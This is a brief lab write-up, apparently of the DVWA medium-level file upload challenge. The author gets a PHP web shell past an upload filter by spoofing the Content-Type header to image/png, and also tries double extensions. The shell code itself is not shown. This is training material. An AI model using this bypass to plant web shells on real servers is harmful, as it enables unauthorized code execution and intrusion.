### Objective

Execute any PHP function of your choosing on the target system (such as [phpinfo()](https://secure.php.net/manual/en/function.phpinfo.php) or [system()](https://secure.php.net/manual/en/function.system.php)) thanks to this file upload vulnerability.

Let's try uploading a php file first.
```txt
Your image was not uploaded. We can only accept JPEG or PNG images.
```
So they must have checked it first, let's view the source code.
```php
`if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&  
        ( $uploaded_size < 100000 ) )`
```
So what's happening here, it checks if the uploaded type is image/jpeg or image/png. If one of them is it passes.
Let's try double extensions. I saved the request in BurpSuite
```txt
shell.png.php
```
Not working how about if we change the filename and content-type
```txt
shell.png
image/png
```
Response
```txt
../../hackable/uploads/shell.png succesfully uploaded!
```
Okay it works but it cant be displayed since it's php code. 
After looking at it again, it isn't really checking anything except for the 'Content-Type ' header. What if we change it to image/png?

```txt
filename: shell.php
Content-Type: image/png
```
```txt
../../hackable/uploads/shell.php succesfully uploaded!
```
Ah that was easy, almost fell into my rabbit hole.


